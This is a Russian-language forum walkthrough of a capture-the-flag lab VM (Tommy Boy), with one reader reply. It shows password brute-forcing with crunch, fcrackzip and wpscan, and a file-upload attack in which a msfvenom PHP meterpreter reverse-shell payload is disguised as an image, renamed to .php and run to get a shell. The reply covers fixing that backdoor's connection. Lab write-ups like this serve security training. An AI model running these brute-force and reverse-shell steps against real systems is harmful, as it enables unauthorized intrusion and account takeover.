CTF. Hack The Tommy Boy VM. Part II.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 2 окт 2016.

  1. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    316
    Симпатии:
    285
    Итак, продолжаем разгадывать секреты в CTF Hack The Tommy Boy VM.

    В прошлой части – ссылка, мы остановились на том, что при попытке просмотреть содержимое папки на сервере, по адресу - http://172.16.0.129:8008/NickIzL33t нас поджидало такое сообщение.

    upload_2016-10-2_14-20-17.png

    Ищем надстройку в Firefox под названием “User Agent Switcher”, затем устанавливаем ее.

    upload_2016-10-2_14-20-34.png

    Возвращаемся на страницу сервера и открываем Tools > Default User Agent > Iphone3.

    upload_2016-10-2_14-21-4.png

    После этого сообщение изменяется на следующее:

    upload_2016-10-2_14-21-23.png

    Для того чтобы обнаружить скрытый файл на сервере будем использовать программу DirBuster предустановленную в Kali linux. Запустим ее с такими параметрами:

    upload_2016-10-2_14-22-28.png

    В дополнительных опциях укажем:

    upload_2016-10-2_14-22-42.png

    Запускаем сканирование. В результате находим файл под названием fallon1.html. Он как раз нам и нужен.

    upload_2016-10-2_14-23-5.png

    Теперь обратимся к серверу по адресу: 192.168.0.107:8008/NickIzL33t/fallon1.html

    upload_2016-10-2_14-25-37.png


    · Теперь у нас есть Третий Флаг – Flag Data: TinyHead

    · Подсказки

    upload_2016-10-2_14-26-15.png

    · И архив, который необходимо скачать.

    Сохраняем его себе. Попытка открыть его не увенчалась успехом, файл просит пароль:

    upload_2016-10-2_14-26-41.png

    Для взлома пароля предлагаю использовать crunch. Тоже предустановленный в Кали, подробнее о нем здесь - https://codeby.net/bezopasnost/crun...osnovy-ispolzovanija-i-prakticheskie-primery/

    Запустим его с параметрами, на которые нам указали в файле с подсказками:

    > crunch 13 13 -t bev,%%@@^1995 -o lists.txt

    upload_2016-10-2_14-27-6.png

    На выходе получаем словарь с паролями, к которому применим программу fcrackzip, запускаем ее с параметрами:

    > fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip


    upload_2016-10-2_14-28-4.png

    Через несколько минут, получаем искомый пароль. Используем его для открытия файла в архиве.

    upload_2016-10-2_14-28-27.png

    Теперь, для того, чтобы найти пароль четвертого пользователя, будем использовать wpscan, к тому же, здесь есть подсказка, она указывает на известную песню группы Queen. Не вдаваясь в подробности, скажу, что имелась в виду, песня «We Will Rock You» являясь отсылкой к словарю паролей в Kali Linux rockyou.txt, его мы и будем использовать.

    > wpscan -- url http://192.168.0.110/prehistoricforest/wp-login.php --wordlists /usr/share/wordlists/rockyou.txt --username tom --wp-content-dir /wp-content

    upload_2016-10-2_14-29-7.png

    Окончания брутфорса я так и не дождался, т.к. wpscan сообщил, что получил неизвестный ответ при попытке использовать пароль tomtom1. Полагаю это связано с проблемой с самой VM, т.к. после, я долго не мог зайти по этому логину/паролю. В общем, логинимся в системе, используя полученные учетные данные.

    upload_2016-10-2_14-30-55.png

    Видим следующую замечательную подсказку про SSH. Попробуем обратиться к серверу по SSH, используя недостающую часть пароля - 1938!!

    upload_2016-10-2_14-31-22.png

    Далее с помощью команды ls –lsa осмотримся:

    upload_2016-10-2_14-31-53.png

    Открываем el-flag-numero-quadro.txt Четвертый Флаг у нас. Помимо флага необходимо обратить внимание на файл callahanbak.bak, так как наша задача восстановить работу сайта воспользуемся этим бэкапом, таким образом:

    upload_2016-10-2_14-32-12.png

    Заходим на сайт Callahan Auto по адресу:

    upload_2016-10-2_14-32-30.png

    Сайт успешно поднят, но нам не хватает Пятого Флага. Один из вариантов приблизиться к его получению, это посмотреть исходный код страницы по адресу:

    upload_2016-10-2_14-32-51.png

    Выделенная строка, указывает на то, что есть возможность загрузить полезную нагрузку в виде изображения в директорию P4TCH_4D4M. Создадим ее, используя msfvenom.

    > msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw

    upload_2016-10-2_14-33-13.png

    Скопируем полученный код как на скриншоте, затем поместим его в файл, прописав ему расширение .jpg. Сохраняем и загружаем его на сервер, чтобы сделать это откроем в браузере страницу по адресу – 192.168.0.110:8008/NickIzL33t//P4TCH_4D4MS/uploads.

    Еще запустим msfconsole с такими параметрами:

    upload_2016-10-2_14-34-5.png

    Теперь необходимо переименовать файл в .php, для этого перейдем на сервере в папку /uploads.

    > cd /var/thatsg0nnaleavemark/NickIzL33t/P4TCH_4D4MS/uploads

    Переименуем файл:

    > mv 2.php.jpg 2.php

    upload_2016-10-2_14-34-31.png

    Теперь, для получения сессии meterpreter, запустим выполнение файла 2.php.

    Для этого переходим в браузере по адресу как на скриншоте ниже:

    upload_2016-10-2_14-35-6.png

    Пришло время забрать Пятый Флаг, переходим в окно с сессией и вводим команду shell,

    команда whoami покажет, что мы в системе под www-data, теперь можно прочесть содержимое файла 5.txt.

    upload_2016-10-2_14-35-21.png

    Теперь у нас есть все пять частей пароля, соберем их воедино - B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack.

    Воспользуемся им для распаковки архива содержащегося в папке Большого Тома – LOOT.ZIP.

    > cd ~

    upload_2016-10-2_14-35-50.png

    На этом прохождение Tommy Boy VM можно считать оконченным.

    Спасибо за внимание.
     
    Inject0r, gx6060 и WebWare Team нравится это.
  2. FreeGa3

    FreeGa3 New Member

    Регистрация:
    16 окт 2016
    Сообщения:
    1
    Симпатии:
    1
    Очень интересные темы(первая и вторая)
    Но возникла проблема - при коннекте к ssh - выбивает ошибку Permission denied и все,больше никаких ошибок.
    В чем может быть проблема?

    P.S проблему решил -_- оказывается пропустил 2 символа в конце.

    P.P.S появилась новая проблема - сделал скрипт-бэкдор.При открытии файла 2.php выбивает ошибку:
    no socket
    Как решить?Буду благодарен
    Проблема решена - решение нашел в соседней теме с взломом Mr.Robot.
    В создании бэкдора надо указать свой ип,а так же в mfs тоже в lhost надо указать свой ип
     
    #2 FreeGa3, 17 окт 2016
    Последнее редактирование: 17 окт 2016
    Vander нравится это.
Загрузка...

Поделиться этой страницей